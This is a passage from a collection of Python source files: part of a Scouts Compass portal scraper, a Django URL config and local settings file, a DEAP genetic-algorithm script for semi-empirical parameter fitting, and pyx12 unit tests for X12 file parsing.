renewal_date=parse(cell_text.get("tdRenewal")),
)
# TODO missing data-pk from list(cell)[0].tag == "input", and module names/codes. Are these important?
if ongoing_only:
return schema.MemberMOGLList.parse_obj(training_ogl) if self.validate else training_ogl
training_data = {
"roles": training_roles,
"plps": training_plps,
"mandatory": training_ogl,
}
return schema.MemberTrainingTab.parse_obj(training_data) if self.validate else training_data
def get_permits_tab(self, membership_num: int) -> Union[schema.MemberPermitsList, list]:
"""Returns data from Permits tab for a given member.
If a permit has been revoked, the expires value is None and the status is PERM_REV
Args:
membership_num: Membership Number to use
Returns:
A list of dicts mapping keys to the corresponding data from the
permits tab.
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Permits")
tree = html.fromstring(response)
# Get rows with permit content
rows = tree.xpath('//table[@id="tbl_p4_permits"]//tr[@class="msTR msTRPERM"]')
permits = []
for row in rows:
permit = dict(membership_number=membership_num)
child_nodes = list(row)
permit["permit_type"] = child_nodes[1].text_content()
permit["category"] = child_nodes[2].text_content()
permit["type"] = child_nodes[3].text_content()
permit["restrictions"] = child_nodes[4].text_content()
expires = child_nodes[5].text_content()
permit["expires"] = parse(expires) if expires != "Revoked" else None
permit["status"] = child_nodes[5].get("class")
permits.append(permit)
if self.validate:
return schema.MemberPermitsList.parse_obj(permits)
else:
return permits
# See getAppointment in PGS\Needle
def get_roles_detail(
self, role_number: int, response: Union[str, requests.Response] = None
) -> Union[schema.MemberRolePopup, dict]:
"""Returns detailed data from a given role number.
Args:
role_number: Role Number to use
response: Pre-generated response to use
Returns:
A dicts mapping keys to the corresponding data from the
role detail data.
E.g.:
{'hierarchy': {'organisation': 'The Scout Association',
'country': '...',
'region': '...',
'county': '...',
'district': '...',
'group': '...',
'section': '...'},
'details': {'role_number': ...,
'organisation_level': '...',
'birth_date': datetime.datetime(...),
'membership_number': ...,
'name': '...',
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'line_manager_number': ...,
'line_manager': '...',
'ce_check': datetime.datetime(...),
'disclosure_check': '...',
'references': '...',
'appointment_panel_approval': '...',
'commissioner_approval': '...',
'committee_approval': '...'},
'getting_started': {...: {'name': '...',
'validated': datetime.datetime(...),
'validated_by': '...'},
...
}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
renamed_levels = {
"County / Area / Scottish Region / Overseas Branch": "County",
}
renamed_modules = {
1: "module_01",
"TRST": "trustee_intro",
2: "module_02",
3: "module_03",
4: "module_04",
"GDPR": "GDPR",
}
unset_vals = {"--- Not Selected ---", "--- No Items Available ---", "--- No Line Manager ---"}
module_names = {
"Essential Information": "M01",
"Trustee Introduction": "TRST",
"PersonalLearningPlan": "M02",
"Tools for the Role (Section Leaders)": "M03",
"Tools for the Role (Managers and Supporters)": "M04",
"General Data Protection Regulations": "GDPR",
}
references_codes = {
"NC": "Not Complete",
"NR": "Not Required",
"RR": "References Requested",
"S": "References Satisfactory",
"U": "References Unsatisfactory",
}
start_time = time.time()
if response is None:
response = self._get(f"{Settings.base_url}/Popups/Profile/AssignNewRole.aspx?VIEW={role_number}")
logger.debug(f"Getting details for role number: {role_number}. Request in {(time.time() - start_time):.2f}s")
post_response_time = time.time()
if isinstance(response, (str, bytes)):
tree = html.fromstring(response)
else:
tree = html.fromstring(response.content)
form = tree.forms[0]
if form.action == "./ScoutsPortal.aspx?Invalid=Access":
raise PermissionError(f"You do not have permission to the details of role {role_number}")
member_string = form.fields.get("ctl00$workarea$txt_p1_membername")
ref_code = form.fields.get("ctl00$workarea$cbo_p2_referee_status")
role_details = dict()
# Approval and Role details
role_details["role_number"] = role_number
role_details["organisation_level"] = form.fields.get("ctl00$workarea$cbo_p1_level")
role_details["birth_date"] = parse(form.inputs["ctl00$workarea$txt_p1_membername"].get("data-dob"))
role_details["membership_number"] = int(form.fields.get("ctl00$workarea$txt_p1_memberno"))
role_details["name"] = member_string.split(" ", maxsplit=1)[1] # TODO does this make sense - should name be in every role??
role_details["role_title"] = form.fields.get("ctl00$workarea$txt_p1_alt_title")
role_details["role_start"] = parse(form.fields.get("ctl00$workarea$txt_p1_startdate"))
# Role Status
role_details["role_status"] = form.fields.get("ctl00$workarea$txt_p2_status")
# Line Manager
line_manager_el = next((op for op in form.inputs["ctl00$workarea$cbo_p2_linemaneger"] if op.get("selected")), None)
role_details["line_manager_number"] = maybe_int(line_manager_el.get("value")) if line_manager_el is not None else None
role_details["line_manager"] = line_manager_el.text.strip() if line_manager_el is not None else None
# Review Date
role_details["review_date"] = parse(form.fields.get("ctl00$workarea$txt_p2_review"))
# CE (Confidential Enquiry) Check # TODO if CE check date != current date then is valid
role_details["ce_check"] = parse(form.fields.get("ctl00$workarea$txt_p2_cecheck"))
# Disclosure Check
disclosure_with_date = form.fields.get("ctl00$workarea$txt_p2_disclosure")
if disclosure_with_date.startswith("Disclosure Issued : "):
disclosure_date = parse(disclosure_with_date.removeprefix("Disclosure Issued : "))
disclosure_check = "Disclosure Issued"
else:
disclosure_date = None
disclosure_check = disclosure_with_date
role_details["disclosure_check"] = disclosure_check # TODO extract date
role_details["disclosure_date"] = disclosure_date # TODO extract date
# References
role_details["references"] = references_codes.get(ref_code, ref_code)
approval_values = {}
for row in tree.xpath("//tr[@class='trProp']"):
select = row[1][0]
code = select.get("data-app_code")
approval_values[code] = select.get("data-db")
# select.get("title") gives title text, but this is not useful as it does not reflect latest changes,
# but only who added the role to Compass.
# Appointment Panel Approval
role_details["appointment_panel_approval"] = approval_values.get("ROLPRP|AACA")
# Commissioner Approval
role_details["commissioner_approval"] = approval_values.get("ROLPRP|CAPR")
# Committee Approval
role_details["committee_approval"] = approval_values.get("ROLPRP|CCA")
if role_details["line_manager_number"] in unset_vals:
role_details["line_manager_number"] = None
# Filter null values
role_details = {k: v for k, v in role_details.items() if v is not None}
# Getting Started
modules_output = {}
getting_started_modules = tree.xpath("//tr[@class='trTrain trTrainData']")
# Get all training modules and then extract the required modules to a dictionary
for module in getting_started_modules:
module_name = module[0][0].text.strip()
if module_name in module_names:
info = {
# "name": module_names[module_name], # short_name
"validated": parse(module[2][0].value), # Save module validation date
"validated_by": module[1][1].value or None, # Save who validated the module
}
mod_code = cast(module[2][0].get("data-ng_value")) # int or str
modules_output[renamed_modules[mod_code]] = info
# Get all levels of the org hierarchy and select those that will have information:
# Get all inputs with location data
org_levels = [v for k, v in sorted(dict(form.inputs).items()) if "ctl00$workarea$cbo_p1_location" in k]
# TODO
all_locations = {row.get("title"): row.findtext("./option") for row in org_levels}
clipped_locations = {
renamed_levels.get(key, key).lower(): value for key, value in all_locations.items() if value not in unset_vals
}
logger.debug(
f"Processed details for role number: {role_number}. "
f"Compass: {(post_response_time - start_time):.3f}s; Processing: {(time.time() - post_response_time):.4f}s"
)
# TODO data-ng_id?, data-rtrn_id?
full_details = {
"hierarchy": clipped_locations,
"details": role_details,
"getting_started": modules_output,
}
if self.validate:
return schema.MemberRolePopup.parse_obj(full_details)
else:
return full_details
| 1.960938 | 2 |
quran_text/urls.py | Quran-Tafseer/tafseer_api | 16 | 6877 | <filename>quran_text/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('',
view=views.SuraListView.as_view(), name='sura-list'),
path('<int:sura_num>/<int:number>/',
view=views.AyahTextView.as_view(), name='ayah-detail'),
path('<int:sura_num>/<int:number>',
view=views.AyahTextView.as_view()),
]
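# e.g. a request to "<prefix>/1/1/" resolves to AyahTextView with sura_num=1, number=1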
| 1.882813 | 2 |
konnection/settings/local.py | IanSeng/CMPUT404_PROJECT | 0 | 6878 | <filename>konnection/settings/local.py
from konnection.settings.base import *
from pathlib import Path
import os
import dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SECRET_KEY = 'temporaryKey'
# For tests
# https://stackoverflow.com/a/35224204
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--with-spec', '--spec-color']
# Adding secrets to env file
# From StackOverflow https://stackoverflow.com/a/61437799
# From <NAME> https://stackoverflow.com/users/10415970/zack-plauch%c3%a9
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
dotenv.load_dotenv(dotenv_file)
# Connecting PostgreSQL to Django
# From https://www.digitalocean.com/community/tutorials/how-to-use-postgresql-with-your-django-application-on-ubuntu-14-04
# From Digital Ocean
# From <NAME> https://www.digitalocean.com/community/users/jellingwood
if os.getenv('GITHUB_WORKFLOW'):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'github-actions',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'localhost',
'PORT': '5432'
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'myproject',
'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
} | 1.921875 | 2 |
main.py | PotentialParadox/PyReparm | 0 | 6879 | <gh_stars>0
import random
from evaluation import Evaluator
from generator import generator
from mutate import mutateset
from deap import base
from deap import creator
from deap import tools
from parameter_group import ParameterGroup
import gaussian_output
from analysis import Analysis
from gaussian_input import GaussianInput
from gaussian import gaussian_single
from header import Header
from reparm_data import ReparmData
from genesis import Genesis
import numpy as np
from scipy.optimize import minimize
from copy import deepcopy
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn import svm
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import RandomForestRegressor
#############################################
# BEGIN USER INPUT
#############################################
fin = open("reparm.in", 'r')
file = fin.read()
reparm_data = ReparmData(file)
if reparm_data.reparm_input.should_continue:
reparm_data.load()
else:
Genesis(reparm_data=reparm_data)
reparm_data.save()
############################################
# END USER INPUT
############################################
#############################################
# BEGIN USER INPUT
#############################################
# Number of Generation
NGEN = reparm_data.reparm_input.number_generations
# PopulationSize
PSIZE = reparm_data.reparm_input.population_size
# Crossover Probability
CXPB = reparm_data.reparm_input.crossover_probability
# Mutation Probability
# How likely an individual will be mutated
MUTPB = reparm_data.reparm_input.mutation_probability
# Mutation Rate
# How likely a member of an individual will be mutated
MUTR = reparm_data.reparm_input.mutation_rate
# Crowding Factor
CWD = reparm_data.reparm_input.crowding_factor
# Mutation Perturbation
MUTPT = reparm_data.reparm_input.mutation_perturbation
# Initial Perturbation
IMUTPT = 0.05
# Initial List of parameters
IL = []
for i in range(0, len(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats), 4):
IL.append(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats[i])
# The evaluator (fitness, cost) function
eval = Evaluator(reparm_data=reparm_data)
if reparm_data.best_fitness is None:
reparm_data.best_fitness = list(eval.eval(IL))
reparm_data.original_fitness = deepcopy(reparm_data.best_fitness)
else:
reparm_data.best_fitness = list(eval.eval(IL))
print("original_fitness", reparm_data.original_fitness)
print("starting at", reparm_data.best_fitness)
#############################################
# END USER INPUT
#############################################
#############################################
# BEGIN DEAP SETUP
#############################################
creator.create("FitnessMax", base.Fitness, weights=(-1.0, 0, 0))
creator.create("ParamSet", list, fitness=creator.FitnessMax, best=None)
toolbox = base.Toolbox()
toolbox.register("individual", generator, IL, IMUTPT)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
toolbox.register("mate", tools.cxSimulatedBinary)
toolbox.register("mutate", mutateset, pert=MUTPT, chance=MUTR)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", eval.eval)
pop = toolbox.population(n=PSIZE)
#############################################
# END DEAP SETUP
#############################################
#############################################
# BEGIN GENETIC ALGORITHM
#############################################
for g in range(NGEN):
print("Starting gen:", g)
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2, CWD)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = []
for i in invalid_ind:
try:
fitness = toolbox.evaluate(i)
fitnesses.append(fitness)
reparm_data.observations.append(list(i))
i.fitness.values = fitness
if not reparm_data.best_fitness or fitness[0] < reparm_data.best_fitness[0]:
print("Previous Best", reparm_data.best_fitness)
reparm_data.best_fitness = list(fitness)
reparm_data.best_am1_individual.set_pfloats(i)
print("NewBest Found:", reparm_data.best_fitness)
except TypeError:
fitnesses.append(None)
reparm_data.save()
pop[:] = offspring
#############################################
# End Genetic Algorithm
#############################################
#############################################
# Begin Particle Simulation
#############################################
# for g in range(NGEN):
# for part in pop:
# part.fitness.values = toolbox.evaluate(part)
# if not part.best or part.best.fitness < part.fitness:
# part.best = creator.ParamSet(part)
# part.best.fitness.values = part.fitness.values
# if not best or best.fitness < part.fitness:
# best = creator.ParamSet(part)
# best.fitness.values = part.fitness.values
# for part in pop:
# toolbox.mutate(part)
# print(best, "with fitness", best.fitness)
#############################################
# End Particle Simulation
#############################################
#############################################
# Begin Print Out
#############################################
gin_best = reparm_data.best_am1_individual.inputs[0]
s_opt_header = "#P AM1(Input,Print) opt\n\nAM1\n"
opt_header = Header(s_opt_header)
gin_opt = GaussianInput(header=opt_header,
coordinates=gin_best.coordinates[0],
parameters=gin_best.parameters[0])
fout = open("reparm_best_opt.com", 'w')
fout.write(gin_opt.str())
fout.close()
try:
gout = gaussian_single(gin_opt.str())
fout = open("reparm_best_opt.log", 'w')
fout.write(gout)
fout.close()
except TypeError:
print("Could not get output file from input,"
"most likely, optimization failed to converge")
#############################################
# End Print Out
#############################################
#############################################
# Begin ScikitLearn
#############################################
# # Preprocessor
# targets = np.array(reparm_data.targets)
# X = np.array(reparm_data.observations)
# y = targets[:, 0] # 0, 1, 2 for total, energy, and dipole
# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
# stdsc = StandardScaler()
# X_train_std = stdsc.fit_transform(X_train)
# X_test_std = stdsc.transform(X_test)
#
# # Training
# clf = svm.SVR(C=1.3, kernel='rbf')
# # clf = RandomForestRegressor(n_estimators=20)
# clf.fit(X_train, y_train)
# print("Using {} samples with fitness score {}".format(len(y), clf.score(X_test, y_test)))
#
# initial_guess = np.array(IL)
# fun = lambda x: clf.predict(stdsc.transform(x.reshape(1, -1)))
# print("Predicting best parameters")
# min_params = (minimize(fun, initial_guess)).x
# stdsc.inverse_transform(min_params)
# params = min_params.tolist()
# skl_best = deepcopy(reparm_data.best_am1_individual)
# skl_best.set_pfloats(params)
# open("skl_best.com", 'w').write(skl_best.inputs[0].str())
# skl_fitness = eval.eval(params)
# if skl_fitness:
# print("skl_fitness:", skl_fitness)
#############################################
# End ScikitLearn
#############################################
#############################################
# Begin Analysis
#############################################
anal = Analysis(reparm_data)
anal.trithiophene()
#############################################
# End Analysis
#############################################
| 1.976563 | 2 |
pyx12/test/test_x12context.py | arenius/pyx12 | 1 | 6880 | import unittest
#import tempfile
try:
from StringIO import StringIO
except:
from io import StringIO
import pyx12.error_handler
from pyx12.errors import EngineError # , X12PathError
import pyx12.x12context
import pyx12.params
from pyx12.test.x12testdata import datafiles
class X12fileTestCase(unittest.TestCase):
def setUp(self):
self.param = pyx12.params.params()
def _makeFd(self, x12str=None):
try:
if x12str:
fd = StringIO(x12str)
else:
fd = StringIO()
except:
if x12str:
fd = StringIO(x12str, encoding='ascii')
else:
fd = StringIO(encoding='ascii')
fd.seek(0)
return fd
class Delimiters(X12fileTestCase):
def test_arbitrary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, '!')
self.assertEqual(src.ele_term, '&')
self.assertEqual(src.seg_term, '+')
def test_binary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
str1 = str1.replace('&', chr(0x1C))
str1 = str1.replace('+', chr(0x1D))
str1 = str1.replace('!', chr(0x1E))
fd = self._makeFd(str1)
errors = []
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, chr(0x1E))
self.assertEqual(src.ele_term, chr(0x1C))
self.assertEqual(src.seg_term, chr(0x1D))
class TreeGetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_get_line_numbers_2200(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(self.loop2300.seg_count, 19)
self.assertEqual(self.loop2300.cur_line_number, 21)
for seg in loop2400.select('CLM'):
self.assertEqual(seg.seg_count, 25)
self.assertEqual(seg.cur_line_number, 2271)
break
def test_get_line_numbers_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.seg_count, 35)
self.assertEqual(loop2400.cur_line_number, 37)
for svc in loop2400.select('SV1'):
self.assertEqual(svc.seg_count, 36)
self.assertEqual(svc.cur_line_number, 38)
break
def test_get_seg_value(self):
self.assertEqual(self.loop2300.get_value('CLM02'), '21')
self.assertEqual(self.loop2300.get_value('CLM99'), None)
def test_get_seg_value_fail_no_element_index(self):
self.assertRaises(IndexError, self.loop2300.get_value, 'CLM')
def test_get_parent_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../CLM01'), '3215338')
self.assertEqual(loop2400.get_value('../2310B/NM109'), '222185735')
def test_get_seg_value_idx(self):
for clm in self.loop2300.select('CLM'):
self.assertEqual(clm.get_value('02'), '21')
self.assertEqual(clm.get_value('05-3'), '1')
def test_get_first_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV101'), 'HC:H2015:TT')
self.assertEqual(self.loop2300.get_value('2400/SV101-2'), 'H2015')
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/2430/SVD02'), '21')
self.assertEqual(self.loop2300.get_value('2400/AMT[AAE]02'), '21')
def test_get_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '21')
self.assertEqual(loop2400.get_value('2430/AMT[AAE]02'), None)
def test_get_no_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV199'), None)
self.assertEqual(self.loop2300.get_value('2400'), None)
def test_get_parent_no_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../2310E/NM109'), None)
def test_get_specific_qual(self):
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/REF[G1]02'), None)
self.assertEqual(self.loop2300.get_value('2400/REF[XX]02'), None)
class TreeSetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_set_seg_value(self):
self.loop2300.set_value('CLM02', '50')
self.assertEqual(self.loop2300.get_value('CLM02'), '50')
def test_set_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
loop2400.set_value('AMT[AAE]02', '25')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '25')
class TreeSelect(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
#def test_select_loop_and_parent(self):
# loop2400 = self.loop2300.first('2400')
# assert loop2400.id == '2400', 'Not in 2400'
# ct = 0
# newtree = loop2400.parent
# for newtree in loop2400.select('../'):
# self.assertEqual(newtree.id, '2300')
# ct += 1
# self.assertEqual(ct, 1)
def test_select_loops(self):
ct = 0
for newtree in self.loop2300.select('2400'):
self.assertEqual(newtree.id, '2400')
ct += 1
self.assertEqual(ct, 2)
def test_select_seg(self):
ct = 0
for newtree in self.loop2300.select('2400/SV1'):
self.assertEqual(newtree.id, 'SV1')
self.assertEqual(newtree.get_value('SV102'), '21')
ct += 1
self.assertEqual(ct, 2)
def test_select_parent_seg(self):
loop2400 = self.loop2300.first('2400')
assert loop2400.id == '2400', 'Not in 2400'
ct = 0
for newtree in loop2400.select('../CLM'):
self.assertEqual(newtree.id, 'CLM')
self.assertEqual(newtree.get_value('CLM01'), '3215338')
ct += 1
self.assertEqual(ct, 1)
def test_select_from_st(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'ST_LOOP':
for claim in datatree.select('DETAIL/2000/2100'):
self.assertEqual(claim.id, '2100')
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2100 loops. Should have %i' % (ct, 3))
def test_select_from_gs(self):
fd = self._makeFd(datafiles['simple_837i']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('GS_LOOP'):
if datatree.id == 'GS_LOOP':
for sub in datatree.select('ST_LOOP/DETAIL/2000A/2000B/2300/2400'):
self.assertEqual(sub.id, '2400')
ct += 1
self.assertEqual(
ct, 6, 'Found %i 2400 loops. Should have %i' % (ct, 6))
class TreeSelectFromSegment(X12fileTestCase):
def test_select_from_seg_fail(self):
fd = self._makeFd(datafiles['835id']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'GS':
#self.assertFalseRaises(AttributeError, datatree.select, 'DETAIL/2000/2100')
for claim in datatree.select('DETAIL/2000/2100'):
pass
class TreeAddSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
seg_data = pyx12.segment.Segment('REF*F5*6.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
seg_data = pyx12.segment.Segment('ZZZ*00~', '~', '*', ':')
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, seg_data)
class TreeAddSegmentString(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
new_node = self.loop2300.add_segment('HCP*00*7.11~')
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
new_node = self.loop2300.add_segment('REF*F5*6.11')
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, 'ZZZ*00~')
class SegmentExists(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_qual_segment(self):
self.assertTrue(self.loop2300.exists('2310B'))
self.assertTrue(self.loop2300.exists('2310B/NM1[82]'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_qual_segment_sub_loop(self):
self.assertTrue(self.loop2300.exists('2400/2430'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]'))
self.assertFalse(self.loop2300.exists('2400/2430/DTP[111]'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]03'))
def test_qual_segment_select_sub_loop(self):
loop2430 = self.loop2300.first('2400/2430')
self.assertTrue(loop2430.exists('DTP'))
self.assertTrue(loop2430.exists('DTP[573]'))
self.assertTrue(loop2430.exists('DTP[573]03'))
def test_qual_834_dtp(self):
fd = self._makeFd(datafiles['834_lui_id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertTrue(loop2300.exists('DTP[348]'))
self.assertFalse(loop2300.exists('DTP[349]'))
class TreeAddLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment(
'NM1*82*2*Provider 1*****ZZ*9898798~', '~', '*', ':')
new_node = self.loop2300.add_loop(seg_data)
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2310B'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_add_new_string_seg(self):
old_ct = self.loop2300.count('2400')
new_node = self.loop2300.add_loop('LX*5~')
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2400'))
self.assertEqual(old_ct + 1, self.loop2300.count('2400'))
for loop2400 in self.loop2300.select('2400'):
self.assertTrue(loop2400.exists('LX'))
class TreeAddLoopDetail(X12fileTestCase):
def test_add_loops_under_detail(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&BE&ZZ000&ZZ001&20030828&1128&17&X&004010X095A1+\n'
str1 += 'ST&834&11280001+\n'
str1 += 'BGN&+\n'
str1 += 'INS&Y&18&30&XN&AE&RT+\n'
str1 += 'SE&4&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errors = []
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for st_loop in src.iter_segments('ST_LOOP'):
if st_loop.id == 'ST_LOOP' and st_loop.exists('DETAIL'):
detail = st_loop.first('DETAIL')
self.assertTrue(detail.exists('2000'))
detail.first('2000').delete()
self.assertFalse(detail.exists('2000'))
detail.add_loop('INS&Y&18&30&XN&AE&RT+')
self.assertTrue(detail.exists('2000'))
class TreeAddNode(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_loop(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, '2400'), 2)
for node in loop2300.select('2400'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, '2400'), 4)
def test_add_segment(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, 'CN1'), 1)
for node in loop2300.select('CN1'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, 'CN1'), 2)
def test_fail(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
for node in loop2300.select('CN1'):
cn1 = node
break
n2400 = None
for node in loop2300.select('2400'):
n2400 = node
break
assert n2400 is not None, 'Loop 2400 was not matched'
self.assertRaises(pyx12.errors.X12PathError, n2400.add_node, cn1)
def _get_count(self, node, loop_id):
ct = 0
for n in node.select(loop_id):
ct += 1
return ct
class CountRepeatingLoop(X12fileTestCase):
def setUp(self):
